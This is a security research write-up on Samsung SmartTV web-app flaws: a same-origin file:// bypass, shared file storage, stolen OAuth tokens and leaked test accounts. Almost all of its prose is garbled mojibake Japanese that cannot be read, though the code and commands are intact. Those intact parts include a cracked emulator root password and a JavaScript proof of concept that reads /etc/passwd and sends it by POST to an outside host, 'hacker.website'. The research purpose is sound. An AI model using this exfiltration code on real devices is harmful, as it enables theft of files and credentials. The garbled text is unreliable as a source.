
mnn.comããã®ç»å
ã話ãèšèã«å人æ å ±ããã®ä»ã®æ©å¯æ å ±ãå«ãŸããŠããå Žåããã®æ å ±ã¯ãã£ããã£ãããŠç¬¬äžè ã«éä¿¡ãããããŒã¿ã«å«ãŸããããšã«æ³šæããŠãã ãããã
Samsung SmartTVæ©å¯ä¿æå¥çŽïŒ 2015幎2æãŸã§ ïŒ
ãã¬ã¹ã¯ãªãŒã³ã¯ãåæã«éåä¿¡ãããŸãã éåžžã«äœãããããã®ã¬ãã«ãè¶ ãããŠã£ã³ã¹ãã³ãäœæããé³ã¯ãããã«ãã£ãŠæŸãããŸãã ããã«ã圌ãéå±æ¿ãåœããèŠçå ã«çãŸã£ãŠããéãã圌ã¯èŠãããšãèãããšãã§ããŸããã ãã¡ãããããªãããã€ã§ãèŠãããŠãããã©ãããç¥ãæ¹æ³ã¯ãããŸããã§ããã Thought Policeãåã ã®ã¯ã€ã€ãŒã«æ¥ç¶ãããé »åºŠãŸãã¯ã·ã¹ãã ã¯åœãŠæšéã§ããã
ã1984ã-1949幎ã«åºçããããžã§ãŒãžãªãŒãŠã§ã«ã«ãããã£ã¹ããã¢å°èª¬
ãšã³ããªãŒ
æåéãå é±ãZeroNightsã«ã³ãã¡ã¬ã³ã¹ãéå¬ãããŸãããããã«ã€ããŠã¯ãHabréã«ã€ããŠå€ãã®ããšãæžããŸããïŒæçµã¬ããŒãã¯ãŸã å ¬éãããŠããŸãããè¿œå ããå¿ èŠããããŸãïŒã ãããŠãä»ã®ãã¹ãŠã«å ããŠãSamsung SmartTVã«é¢ããã¬ããŒããèªãã§ããã®ãããªãã«ãã¡ãã£ã¢ãã©ãããã©ãŒã ãèšèšãããšãã«ãçŽè¿ã§æãç°¡åãªãœãªã¥ãŒã·ã§ã³ã«ãã£ãŠçŽæçã«å°ãããå Žåã«äœãèµ·ããå¯èœæ§ãããããäŒããŸããïŒãã®ãããã¯ã詳现ã«æããã«ããŸãïŒã ç©èªã®åœ¢åŒã¯å¹Žä»£é ã«éžæãããŸããã ç§ããã®ãããªããã€ã¹ã®ãšã³ãžãã¢ã§ãã£ãå Žåãã©ã®ããã«èŠããã©ã®ããã«ãœãªã¥ãŒã·ã§ã³ã解決ãããã
SmartTVãèŠèŽãããšããã¢ã€ãã¢ãåŸãã®ã¯ãåžå Žã§æã人æ°ããããããSamsungãéžã°ããããã§ãã å€æããããã«ããããã¯ã¯ãã§ã«æããã«ãããŠããŸãïŒ
- samygo.tv
- media.blackhat.com/us-13/US-13-Lee-Hacking-Surveilling-and-Deceiving-Victims-on-Smart-TV-Slides.pdf
- community.hpe.com/t5/Security-Research/Hacking-my-smart-TV-an-old-new-thing/ba-p/6645844#.VKHH9AIqA
- www.delaat.net/rp/2012-2013/p39/report.pdf
- marcoramilli.blogspot.ru/2013/05/firmware-hacking-samsung-smart-tv-turn.html
- ...
ã€ãŸã ãã§ã«ãªã¢ãŒãã§ïŒïŒïŒåœŒããè£å®ïŒã«ã¡ã©ãšãã€ã¯ããã®ããŒã¿ãèšé²ïŒãããããã¯ãŒã¯ãããã³ã«ãå解ãããå®éã«ãããã¯ãéåžžã«ããã«ããŒããŠããŸããã åæã«ãç§ã¯èª°ããèªåæŽæ°ããªãã«ããããšãå§ããŠããããšã«æ°ã¥ãå§ããŸãããä¿®æ£ãåºãŠããŸããã€ãŸãããµã ã¹ã³ã¯ãã°ãè©°ãŸãããããã®ãããã¯ãç£èŠããŸãã
ã»ããã£ãœãæ·±å»ãªäŒè°ã§å¥åŠãªãã¬ãŒã³ããŒã·ã§ã³ããããŸãããwww.rsaconference.com/ writable / presentations / file_upload / ht-r08-how-hackers-are-outsmarting-smart-tvs-and-why-it- matter-to-you_copy1.pdf ãRSAã䜿çšããŠãèè ãè匱æ§ãçºèŠããããªã¹ã¯ãå€ããœãããŠã§ã¢ïŒãã©ãŠã¶ãå«ãïŒãç ç²ã«ããŠãã¹ãŠãç Žå£ããããšãããã«ç°¡åã§åçŽããåæ ããŸããããäœããæžããããã¯ãç¡èŠããŸããã·ã§ã«ã³ãŒããäœæããåäžã®æŠå¿µå®èšŒããããããŸããã§ããïŒãããã£ãŠãå®å šãªåŸéããããŸãïŒã SmartTVã®ã©ã³ãµã ãŠã§ã¢ã«é¢ãããã®ãããªçŸããåçã®ãã¥ãŒã¹ã¯ãäžéšã®äººããœãªã¥ãŒã·ã§ã³ã販売ããããã«ãã©ãããã©ãŒã ã䜿çšãããããšãæããã«ããŸããã
SmartTVã¢ããªã±ãŒã·ã§ã³ãHTML / CSS / JSã§äœæãããŠããããšãç¥ã£ãŠã圌ã¯ç¢ºãã«ãã®ãããã¯ã«é¢ããã¬ããŒãã®æ€çŽ¢ãéå§ããŸããã ãããã圌ãã¯...ã§ã¯ãããŸããïŒ ããããç§ã¯ãããã¯ãç解ããããšã«ããŸããã
æåã«ã¢ãã«ç¯å²ã決å®ãã2ã€ã®ã«ããŽãªã«åããããŸãã
- 2008-2014-AãBãCãDãEãFãHïŒBadaïŒ-ã»ãŒãã¹ãŠã®ã¢ãã«ã埮調æŽã§ããŸãïŒã€ã³ã¹ããŒã«ãããŠãããããã«äŸåããå ŽåããããŸãïŒãåžå Žã«ãªãã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããæ¹æ³ã®æ
- 2015+-JïŒTizenïŒ-ææ°ã¢ãã«ã ããã€ã¹ãã«ãŒãåããããã®å ¬ã«ç¥ãããæ¹æ³ã¯ãªãã®ã§ãä»ã®ãšãããããã¯ã¯ã«ããŒãããŠããŸããã ããããããªãã¯ãã§ã«ããªãã®ã¢ããªã±ãŒã·ã§ã³ã眮ãããšãã§ããŸã
ã€ã³ã¿ã©ã¯ã·ã§ã³ã¢ãŒããã¯ãã£
ç§ã®ã©ããã§ãSmartTVã®ã¢ããªã±ãŒã·ã§ã³ã®åäœåçããã©ãŠã¶ã®æ¡åŒµæ©èœã®åäœïŒAPIãžã®ã¢ã¯ã»ã¹ãç°ãªãçæå ãªã©ïŒã«äŒŒãŠããã¹ãã ãšããããšã«æ°ã¥ããã°ãŒã°ã«ãå§ããŸããã ããããç§ã¯ãã®ãããªãã®ã ããèŠã€ããŸãã

APIãè¿œå ããã«éåžžã®åçã³ã³ãã³ããçŽæ¥æäœããã·ã¹ãã ã®å žåã§ãããããããã¯å°ãå¥åŠã§ããã æ¡åŒµæ©èœã䜿çšããçµéšãæåŸ ãããã¹ãŠãèŠã€ããããšã¯ã§ããããã®çãã¯å°ãåŸã§èŠã€ãããŸããã
çšé
ã¢ããªã±ãŒã·ã§ã³ã®ãããã¯ãåãäžããŠããã§ã«ãã®ãããã¯ã«é£ã³èŸŒã¿å§ããŠããã®ã§ãããªãèªèº«ã®äœããæžãæã§ãã SmartTVã®å žåçãªã¢ããªã±ãŒã·ã§ã³ã¯ãäœã¬ãã«APIïŒã€ãŸããä»ã®ãã¹ãŠãšåæ§ã«åŒã³åºãããšã®ã§ããè¿œå ã®JavaScripté¢æ°ã®ã»ããïŒã«ã¢ã¯ã»ã¹ã§ãããéåžžã®ãåäžããŒãžã¢ããªã±ãŒã·ã§ã³ïŒåäžããŒãžã¢ããªã±ãŒã·ã§ã³ïŒã§ãã
ã¢ããªã±ãŒã·ã§ã³ã¯HTML / JS / CSSãã¡ã€ã«ã§æ§æãããããã«XMLãšJSONïŒäž»ã«ã¡ã¿æ å ±ïŒããããŸãã ããããäžè¬çã«-éçã
ãµã ã¹ã³ã¯ãããªãèå³æ·±ãæ¹æ³ã§éçºè ã«ãšãã¥ã¬ãŒã¿ãŒãæäŸããŸãïŒ VirtualBox Machineãå«ã
- www.samsungdforum.com/Devtools/SdkDownload-SDK EmulatorïŒ 5.1ã2014 ïŒ
- Ubuntu 12.04.2 LTS
- Linux smarttvemulator 3.2.0-41
- 1 GB RAM / 8 GB HDD
- ã¢ããªã±ãŒã·ã§ã³ãå®è¡ã§ããŸããããã¹ãŠã®APIãå©çšå¯èœã§ã
- ãã¹ãŠãã«ãŒããšããŠæ©èœããŸãïŒåŸã§å€æïŒ
ãŸããã¢ããªã±ãŒã·ã§ã³ãé 眮ããå¿ èŠã®ãããã¹ãã·ã¹ãã ãšã®å ±æãã£ã¬ã¯ããªãããã€ãã»ããã¢ããããããšãææ¡ããŸãã

Samsung SmartTVãšãã¥ã¬ãŒã¿ãŒãçºå£²
éåžžã«èå³æ·±ã解決çã§ãããã¢ã¯ã»ã¹ãèš±å¯ããªããªããŸããã æ¢è£œã®ãŠã£ãžã§ãããã€ã³ã¿ãŒãããã«ããŠã³ããŒãããåŸããããAppsãã©ã«ããŒã«ã³ããŒããŠèµ·åããŸãããåäœããŸãã åæ¹èšå ¥ãèŠãæéã§ãããè«ççãªæ¬²æ±ã¯sshãä»ããŠãã°ã€ã³ããããšã§ããããäœããã®çç±ã§ïŒããŠã³ããŒãããŒãžã§ïŒã©ãã«ããã®ãã¹ã¯ãŒãã衚瀺ãããŸããã§ããã
ã°ãŒã°ã«ãå§ãããæåã®ã2çªç®ã®ããŒãž...ã©ãã«ããããŸããã ç§ã®ãããã¯ã«é¢ããèšäºã«åºããããŸããïŒå¯äžã®ããã§ãïŒ -mherfurt.wordpress.com/2014/10/10/auditing-samsung-smart-tv-appsã§ããã圌ã¯æžããŠããŸã
æ®å¿µãªãããsmarttvãŠãŒã¶ãŒããä»®æ³ãšãã¥ã¬ãŒã¿ã«ãã°ãªã³ããå¯èœæ§ã®ããä»ã®ãŠãŒã¶ãŒããå ¬éãããŠãããã¹ã¯ãŒãã¯ãããŸããã
ãã®å Žåãç§ãã¡ã¯èªåã§ãããèŠã€ããã§ããã
- ãšãã¥ã¬ãŒã¿ãã£ã¹ã¯ãå¥ã®Linuxã·ã¹ãã ã«ããŠã³ãããŸãïŒå¥ã®ä»®æ³ãã·ã³ã«ããŠã³ãããŸããïŒ
- ãã¹ã¯ãŒããæ¢ããŠããŸã
æåã®æ¹æ³
1ã
# cat /etc/shadow root:g4KfRyC9MkXuM:16177:0:99999:7:::
2. hashcat
3.1q2w3E
2çªç®ã®æ¹æ³ïŒ
# grep -r mkpasswd . ./checkAndLaunchEmulator.sh: [ -f /home/smarttv/Installer/.releaseOVAFlag ] && usermod smarttv -p `mkpasswd 1q2w3E` && cp -f .xinitrc.r .xinitrc && usermod root -p `mkpasswd 1q2w3E`
OKãæåŸã«ãã¹ã¯ãŒããã°ãŒã°ã«ã«ããŠæåã®ããŒãžã«è¡šç€ºããŸã
SAMSUNG SMART TVãšãã¥ã¬ãŒã¿ãŒã®ã«ãŒããã¹ã¯1q2w3Eã§ã
ããã§ããã¹ãã·ã¹ãã ã®ã¢ããªã±ãŒã·ã§ã³ãåããä»®æ³ãã·ã³ãäœæãããŸããããã®ãã¡ã€ã«ã¯Sublimeã§éããããšãã¥ã¬ãŒã¿ã®ã«ãŒãã«ãªããŸãã å®æããã¢ããªã±ãŒã·ã§ã³ãèµ·åããäžèŠãªãã®ããã¹ãŠåé€ããåŸïŒãµã ã¹ã³ãã空ã®ã¢ããªã±ãŒã·ã§ã³ãååŸããããšãã§ããŸã-www.samsungdforum.com/Guide/art00011/index.html ïŒãã·ã¹ãã ãã¢ããªã±ãŒã·ã§ã³ã®åäœãããã³èœãšãç©Žã«ã€ããŠèª¬æããŸãã
ãã¡ã€ã«ã·ã¹ãã ãæäœãã
æ»æè ã®èŠ³ç¹ããèŠããšãæåã«ã¢ã¯ã»ã¹ããããã®ã¯ïŒRCEãé€ããŠïŒãã¡ã€ã«ã·ã¹ãã ããã³ãã®ä»ã®ããŒã¿ãžã®ã¢ã¯ã»ã¹ã§ãã ãããŠããããæäœããããã«ãFileSystemãšããç¹å¥ãªã¯ã©ã¹ããããŸãã ã³ãŒãäŸïŒ
var fileSystemObj = new FileSystem(); var fileObj = fileSystemObj.openCommonFile(curWidget.id + '/testFile.data', 'r'); var strResult = fileObj.readAll();
èŠãç®ã¯è¯ãã§ããã... curWidget.idãšã¯äœã§ããïŒ è«ççã«ã¯ãããã¯äžçš®ã®çŸåšã®ã¢ããªã±ãŒã·ã§ã³ãã©ã«ãã§ãã ãããããªããããéä¿¡ããŸããïŒ ãªããžããªã®ã«ãŒãã«ãããã¡ã€ã«ãæ¬åœã«éãããšãã§ããŸããïŒ ãŸãã¯... ä»ã®äººã®ã¢ããªã±ãŒã·ã§ã³ã®ãªããžããªãéããŸããïŒ ãããå€æããããã«-ã¯ãããããŠãã®ææžã«ãã³ãããããããã§ãã ãŸãã.. / .. / .. / .. /ãä»ããŠäžéšã®/ etc / passwdãžã®ã¢ã¯ã»ã¹ã確èªããŸãããäœãçºçããŸããã
SmartTVçšã®VKã¢ããªã±ãŒã·ã§ã³ãããŠã³ããŒãããåŸãç§å¯ã®OAuthããŒã¯ã³ãä¿åããå Žæã確èªããããšã«ããŸããã å€æããããã«ãäžèšã®ã¢ã«ãŽãªãºã ãšãŸã£ããåãããã«ãã©ã«ããŒå ã§å®è¡ããŠãã ããïŒ çµè«ãšããŠããã¯ã¿ãŒïŒ
- 被害è ã¯äœããã®ãœãŒã·ã£ã«ããã®ç³è«ãæã£ãŠããŸãã å ±æã¹ãã¬ãŒãžãä»ããŠã·ãŒã¯ã¬ããããŒã¯ã³ãä¿åãããããã¯ãŒã¯ïŒããšãã°ãVKã§å€æããããã«ïŒ
- 被害è ã¯ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããŸã
- ãã®ã¢ããªã±ãŒã·ã§ã³ã¯ãç§å¯ã®OAuthããŒã¯ã³ãçã¿ãŸã
解決çïŒ åãlocalStorageã«ããŒã¯ã³ãä¿åããŸãã
çµæ-ã¢ã«ãŠã³ãã®çé£ã ããã«ã€ããŠãVKã¢ããªã±ãŒã·ã§ã³ã®éçºè ãšè©±ãããããšã«ããŸããã圌ãã¯localStorageããã¹ãŠã®ã¢ãã«ã§å©çšã§ããããã§ã¯ãªãã®ã§ãããã¯ãã®ãããªãã©ãŒã«ããã¯ã§ãããšèšããŸããïŒãã ããé©åãªãã§ãã¯ãæäŸããŸããïŒã çµå±ã®ãšãã-ããã¯ããããä¿åããŸããïŒäžè¬ã«ãéçºè ïŒ:)
Samsungãä¿®æ£ããŸããïŒ
- åã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ãããšãã«ãã·ã¹ãã ã«æ°ãããŠãŒã¶ãŒãäœæããŸãïŒAndroidã®å Žåã®widget12345ãªã©ã®èªåå¢åIDã䜿çšïŒã
- åŸæ¹äºææ§ã®ããã«APIãå€æŽããªãã§ãã ããããã ãããŠãŒã¶ãŒãšcurWidget.idãã©ã«ããŒã®äžã§åã¢ããªã±ãŒã·ã§ã³ãå®è¡ããæ£ããchmod / chownæš©éãå²ãåœãŠãŠãã ããã ãããŠãéçºè ã¯èšã-ããªãã®ãã©ã«ãã«ã®ã¿ç§å¯ã®ããŒã¿ãä¿ç®¡ããŠãã ããã ä»ã®ã¢ããªã±ãŒã·ã§ã³ãšããŒã¿ã亀æããå¿ èŠãããå Žåã¯ãã«ãŒãã«æžã蟌ã¿ãŸãã
ã«ã¢ã¯ã»ã¹ããããã®ç¬èªã®APIããããŸã
- ãã€ã¯ãž
- ã«ã¡ã©
- ãã¹ãŠã®ããã€ã¹ã1ã€ã®ãããã¯ãŒã¯ã«çµåã§ããSmartHomeãã¯ãããžãŒ
- ãããã¯ãŒã¯ïŒååŸ/èšå®ïŒ
- ãžã§ã¹ãã£ãŒ
- ãã®ä»ã®äœã¬ãã«é¢æ°
ããããç§ã¯ã¢ããªã±ãŒã·ã§ã³ãäžè¬çã«å®è¡ããå Žæãåãæ¿ããŠç解ããããšã«ããŸããã
åäžèµ·æºããªã·ãŒ
ãã¹ãŠã®Webéçºè ãç解ããå¿ èŠãããã®ã¯ãããã3ã€ã®äž»èŠãªåèªãšãã®æå³ã§ãã å¹³å¡ãªäœã
document.write(document.location)
ãã©ãŒã ãã¡ã€ã«ã®ã¢ãã¬ã¹ãååŸããŸããïŒ///mtd_down/widgets/user/XXX/index.htmlïŒåœ= RUã§ãã¹ããŒã ãã¡ã€ã«ãèŠãŸããïŒ///ã¯ãã²ã©ãé©ããŸããã ä»»æã®JSã䜿çšããŠHTMLããŒãžãèµ·åããŠããŸãããSmartTVã®ãã¹ãŠã®éçºè ã¯åãããšãç¥ã£ãŠããŸãïŒ 6æ³ïŒ ãªã誰ãã¢ã©ãŒã ã鳎ãããŸããã§ãããïŒ ãããã¯-JSãå®è¡ããã«ã¯ãçŸåšã®Originã«ã®ã¿ã¢ã¯ã»ã¹ã§ããŸãããã®å Žåã¯ããã¡ã€ã«ã䜿çšããŠ///-ãã¡ã€ã«ã·ã¹ãã å šäœã«ã¢ã¯ã»ã¹ã§ããŸãã ææ°ã®ãã©ãŠã¶ã«ã¯æŸèæãããïŒNS_ERROR_DOM_BAD_URIïŒå¶éãããURIãžã®ã¢ã¯ã»ã¹ãæåŠãããŸããïŒããããçŠæ¢ããŠããŸãããããã§ã¯çŠæ¢ããŠããŸãã ã€ãŸã ãŠã£ãžã§ããã¯ããã©ãŠã¶ãå®è¡ãããŠãããŠãŒã¶ãŒã®äžã§ïŒajaxãªã¯ãšã¹ããä»ããŠïŒãã¡ã€ã«ã·ã¹ãã ã«ã¢ã¯ã»ã¹ã§ããŸãã
ãã¬ãããå€éšãµãŒããŒã«ããŒã¿ãéä¿¡ããå°ããªPoCãäœæãã
file = 'file:///etc/passwd'; var rawFile = new XMLHttpRequest(); rawFile.open("GET", file, false); rawFile.onreadystatechange = function () { if(rawFile.readyState === 4) { if(rawFile.status === 200 || rawFile.status == 0) { var allText = rawFile.responseText; var url = "http://hacker.website/smarttv/"; var params = "file="+file+"&content="+allText; var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send(params); } } } rawFile.send(null);
ç§ã¯ããããã¹ããå§ããŸããã çµæ-/ etc / shadowïŒã«ãŒãã®äžã«ããããïŒã¯ããšãã¥ã¬ãŒã¿ãŒããã³å®éã®ãã¬ãã§ãã¹ãŠã®äžè¬çãªãã¡ã€ã«ã§æ£åžžã«èªã¿åãããŸããã

ãšãã¥ã¬ãŒã¿ãŒã§ãã¹ãããŸãã æ確ã«ããããã«ã/ etc / shadowã®å 容ãç»é¢ã«è¡šç€ºããŸã
ãã¬ãã»ãã
ãã¡ã€ã«ïŒ/// etc / passwd
root::0:0:Root,,,:/:/bin/sh app::1010:1010:app,,,:/:/bin/sh webapp::1011:1011:webapp,,,:/:/bin/sh
ãã¡ã€ã«ïŒ/// etc / group
root::0:0 app::1010:app webapp::1011:webapp gfx::500:app,webapp video::501:app,webapp audio::502:app,webapp disk::503:app,webapp security::504:app,webapp camera::505:505 dtvlogd::506:app
SOPã®åé¡ãããã«è©³ãã調ã¹ããšãã·ã¹ãã ãã¡ã€ã«ãšcookie / localStorageïŒãã€ããªãã¡ã€ã«ã¯åãããã«èªã¿åãããŸãïŒã¢ããªã±ãŒã·ã§ã³ã®äž¡æ¹ãèªã¿åããFileSystemïŒïŒã®å¶éãè¶ ããŠããŸãã
ãã®çµæãåé¡ã¯ãéçºè ãç§å¯ããŒã¿ïŒOAuthããŒã¯ã³ãªã©ïŒã®å®å šãªã¹ãã¬ãŒãžãæã£ãŠããªãããšã§ãã ãããŠãèšäºãšã¬ããŒãã®ã¿ã€ãã«ãšåé ãžã®åç §ã§ãã
Samsungãä¿®æ£ããŸããïŒ
- åã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ãããšãã«ãã·ã¹ãã ã«æ°ãããŠãŒã¶ãŒãäœæããŸãïŒFileSystemã®æ®µèœã®ããã«ãwidget12345ãªã©ã®èªåå¢åIDã䜿çšïŒã
- * .smartlocalã¿ã€ãã®ãŸãŒã³ãåŠçãã127.0.0.1ã§ãã¹ãŠã®ãã¡ã€ã³ãã©ããããã·ã¹ãã DNSãµãŒããŒãä»ããŠæ®ãã®ã¯ãšãªããããã·ããå°ããªDNSãµãŒããŒãè¿œå ããŸãã ãŸãã¯ããã©ãŠã¶ã§çŽæ¥ããŒãã³ãŒãã£ã³ã°ããŠãã ãã
- ãã§ã«ã€ã³ã¹ããŒã«ãããŠããlighttpdã䜿çšããŠããã®ãŸãŒã³ã解決ããŸãïŒä»®æ³ãã¹ããåŠçããéçãäžããŸãïŒ
- åé¢ãããOriginã§åãŠã£ãžã§ãããèµ·åãã衚瀺ããŸã
ããã¯ããå®å šã§ãããåââé¡ã解決ããŸãã ãŸãã¯ãæ¡åŒµæ©èœãåããChromiumã®ãã¹ããã©ããŸãã倧èŠæš¡ã§åºç¯ãªAPIãåããç¬èªã®ã¹ããŒã ã§ãã
æªæã®ããJSãå°å ¥ããæ¹æ³ã¯ïŒ
- åžå Žã§ã¬ãã¥ãŒã«åæ Œããå€éšJSïŒ<script src = "httpïŒ///"> </ script>ïŒãèªã¿èŸŒãã¢ããªã±ãŒã·ã§ã³ãæ³åããŠãã ããã ã¢ãã¬ãŒããæåãããšãäœæè ã¯ãã¹ãŠã®ãŠãŒã¶ãŒã®å®è¡å¯èœã³ãŒãã眮ãæããŸãã ãã ã®æ¥œåïŒïŒ
- HTTPçµç±ã§ããŒã¿ãã¢ããããŒããããšãã®MitM
- ãŸãã¯... XSSæ»æã çµå±ã®ãšãããããã¯å¹³å¡ãªWebã¢ããªã±ãŒã·ã§ã³ã§ãïŒ
ãããŠãXSSã®äœ¿çšã¯æ¬åœã«æ¥œããã§ãã æ»æãå®è¡ãããšãäœã¬ãã«APIãžã®ã¢ã¯ã»ã¹ã ãã§ãªãããã¡ã€ã«ã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ãååŸããTVãããã¡ã€ã«ããã°ããããŠã³ããŒãããããšããŸãïŒããã§ã¯ããœãŒã·ã£ã«ãµãŒãã¹ãªã©ã®ã¢ããªã±ãŒã·ã§ã³ã§ã¯DOM XSSã®ã¿ãå¯èœã§ãã ãããã¯ãŒã¯ãªã©ã
ã¢ããªã±ãŒã·ã§ã³ã®è匱æ§
ç§ãã¡ãæ±ã£ãŠããããšãæ±ã£ãã®ã§ãéçºè ã«ãã£ãŠæžãããã¢ããªã±ãŒã·ã§ã³èªäœã®åé¡ã«ã€ããŠã話ããŸãã ç§ã¯åã¢ããªã±ãŒã·ã§ã³ãããªãçŽ æ©ã調ã¹ãŸããããããããã®ãªã¹ãããäœããèŠã€ãããŸããã
- XSSãããã«ã€ããŠã¯ãã§ã«è©±ããŸããã éåžžã®SPAã¢ããªã±ãŒã·ã§ã³ããããXSSæ»æãå®è¡ããæ¹æ³ãèŠã€ããå Žåãè¿œå ã®APIïŒããã³ç°ãªãããŒããŠã§ã¢ãžã®ã¢ã¯ã»ã¹ïŒ/ãã¡ã€ã«ã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ãšãç§å¯ããŒã¯ã³/å éšIPã¢ãã¬ã¹ïŒã·ã¹ãã ãã¡ã€ã«ã®èªã¿åãã«ããïŒãçãæ©èœãååŸããŸã/ããã³t .dã ããŒã«ã«ãããã¯ãŒã¯ïŒhttp://ba.net/util/nmap/nmap.htmlïŒãã¹ãã£ã³ããã«ãŒã¿ãŒïŒrouterpwn.comïŒãæ»æããŸãã
- æ å ±æŒæŽ©ïŒéçºãµãŒããŒãã¢ããªã±ãŒã·ã§ã³ã®ãã¹ãããŒãžã§ã³ãå éšIPãªã©ïŒ
- HTML5ã®åé¡ã®äžéšã§ãããå®éã®ç¶æ³ã§ã¯ããããåäœããªãããšãæ£çŽã«èªããŠããŸã
- å®å šã§ãªãããŒã¿è»¢éïŒHTTP + MitMïŒ
ãŸããéçºè ã¯åãCSPã§ã¢ããªã±ãŒã·ã§ã³ããããžããããæ©äŒããããŸããã
æ å ±æŒæŽ©ã®å®éã®äŸãæããŸãããã ãã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ãã¡ã€ã«ã確èªããå¿ èŠããããŸãïŒbanal grepã§ååã§ãïŒã ã¢ããªã±ãŒã·ã§ã³ã®1ã€ã§ããã¹ãã¢ã«ãŠã³ããèŠã€ããããšãå€æããŸãã...
someObject.id = "samsung*****@gmail.com"; someObject.pw = "deXXXXX"; someObject.id = "*********dev@gmail.com"; someObject.pw = "tjXXXXX";
APIã確èªããŸãã 圌ãã¯Facebookã«è¡ããŸãã

ã¢ã«ãŠã³ãã®éåžžãšã¯ç°ãªãå Žæããæ¥ãŠããããšãã»ã®ããããŠããŸã
ãšããã§ãäžèšã®ã¹ã¯ãªãŒã³ã·ã§ããã§ã¯ãã¢ãã€ã«ããŒãžã§ã³ã䜿çšãããŠããããšãããããŸãã ãã¹ã¯ãããçã§ã¯ãã©ã®ç¶æ³ã§ãã°ã€ã³ããŠãããã¯è¡šç€ºãããŸããïŒãããŠã以äžã®ãNot KimïŒãïŒã
ããã€ãã®çµè«ãå°ãåºããŸãã SmartTVããæã¡ã®å ŽåïŒ
- VasyanãããŠã£ãžã§ãããé 眮ããªãã§ãã ãã
- ã«ãŒããæã«å ¥ããŸãããïŒ è³¢ã䜿çšããŠãã ããã åãåã£ãæ¹æ³ã確èªãã
- ãã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ã¯è匱æ§ãªãã§äœæãããXæ¥ç®ã«è¿œå ã®ã³ãŒããããŒããããšä¿¡ããŠãã ãã:)
éçºè ïŒ ããã³ãã®ã¿ãèšè¿°ããããªããå¹³å¡ãªSPAãæã£ãŠããããšã蚌æããããšããªãã§ãã ãããããã¯ãšã³ãã¯ã»ãã¥ãªãã£ã«é¢äžããå¿ èŠããããŸãã è匱æ§ããªãããã«æžããŠãã ããïŒäžè¬çã«ãå®å šã§ãªãããã³ããšã³ãã«ã€ããŠæžãã-habrahabr.ru/company/dsec/blog/259389 ïŒ
ãããã«
- ç§å¯ã®æ¹æ³ã§ãã¡ã€ã«ãä¿åããæ¹æ³ã¯ãããŸããïŒå šäœãšããŠããŒã¯ã³åã®ç§å¯IDããããã¯ããããšãããšãæ»æè ã®ã¿ã¹ã¯ãè€éã«ãªããŸãïŒ
- XSSæ»æçšã«èš±å¯ãããã¹ããŒã¹ã¯ãéåžžãããå€ãã®åé¡ãäœæããŸã
- ã¢ããªã±ãŒã·ã§ã³éçºè ã¯ãã¢ããªã±ãŒã·ã§ã³ã®ã»ãã¥ãªãã£ã«ã€ããŠãŸã èããŠããŸãã
- åžå Žã¬ãã¥ãŒã¯ãå€éšãªãœãŒã¹ããã³ãŒããããŠã³ããŒãããæªæã®ããã¢ããªã±ãŒã·ã§ã³ãèŠéããªããšä¿¡ããŠããŸãã ãµã ã¹ã³ïŒã ãã§ãªãïŒå€éšã®<script src = "httpïŒ///"> </ script>ã®ã¢ããªã±ãŒã·ã§ã³ãã¹ãããããªããšããããªã·ãŒãæ¡çšããŠããæ»æè ã¯åžžã«XSSãç¬èªã®ã¢ããªã±ãŒã·ã§ã³ã§èš±å¯ãããã®æ¹æ³ã§ã³ãŒããæ¿å ¥ã§ããŸãã
- Tizenãå ¥æã§ã次第ããã®å 容ãæŽæ°ããå¿ èŠããããŸãã ç§ã¯ãã£ãŒã³ãšèª°ããèŠã€ããããšããŸããããç§ã®å人ã®äžã«ã¯èª°ãããŸããã§ããã
ãµã ã¹ã³ãå šäœã®ç¶æ³ãèªèããŠããããšã¯æ³šç®ã«å€ããèšäºã®ãã¹ãŠã®ç¹ã«ã€ããŠè©±ããŸããã 圌ãã¯ãã§ã«Tizenã®SOPã®åé¡ãä¿®æ£ããŠããïŒããã¯èšã£ãŠããŸããããŸã èªåã§ç¢ºèªããããšã¯ã§ããŸããïŒãBada TVã®ã¢ããããŒãããªãªãŒã¹ããããšã§ä»ã®åé¡ã«å¯ŸåŠããŠããŸãããããã£ãŠããã³ããŒå šäœãšããŠã¯ããã©ã¹ã«ãªãã ãã§ãããã¬ãã§è匱æ§ïŒ1000ãã«ããïŒãæ¯æã人ïŒç§ã®å ŽåãSOPã®åé¡ããã®ä»ã®åé¡ã«ã€ããŠã¯æ¢ã«ããã£ãŠãããããè³æ ŒããããŸããïŒã
ãã®èšäºã§ã¯ãæåã®æ®µéã§çŽæçã«ã·ã³ãã«ãªãœãªã¥ãŒã·ã§ã³ïŒãã¡ã€ã«ãä»ããŠã¢ããªã±ãŒã·ã§ã³ãèµ·åããæ¹æ³////ïŒããããã€ã¹ã®æ¡åŒµãããã©ã€ã³ã§è§£æ±ºããã®ãããã»ã©å®¹æã§ã¯ãªãäžé£ã®åé¡ã«ã€ãªããå¯èœæ§ããããã»ãšãã©å¯äžã®ãœãªã¥ãŒã·ã§ã³ïŒããã³å€ãã®2008幎ã«ã¢ãŒããã¯ãã£çã«ã³ããããããä»ã®åé¡ïŒã¯ãå¥ã®OSã«ç§»è¡ããŠããŸãã ãããŠããã®ãããªåé¡ã¯ã¹ããŒããã¬ãã ãã§ãªããè»ãå·èµåº«ãªã©ã«ãèµ·ãããŸãããªããªãã誰ã«ãšã£ãŠããŠã§ããçµ±åãããŠã§ãæè¡ã䜿çšããŠã¢ããªã±ãŒã·ã§ã³ãæžãããšãæãç°¡åãªãœãªã¥ãŒã·ã§ã³ã ããã§ãã
ã¬ããŒãã®åŸãç§ã¯èšäºã§ã«ããŒããªãã£ãå€ãã®è³ªåããããŸããïŒã¬ããŒãã®èšé²ã¯å©çšå¯èœã§ãïŒã
ãããŠæåŸã®-ç§ã¯æã£ãŠããªãããSmartTVãæã£ãŠããªãã£ãã å®éã®ããŒããŠã§ã¢ã§ã®ãã¹ãŠã®å®éšã¯ååã«ãã£ãŠè¡ããããã®ããã«èŠããŸãã
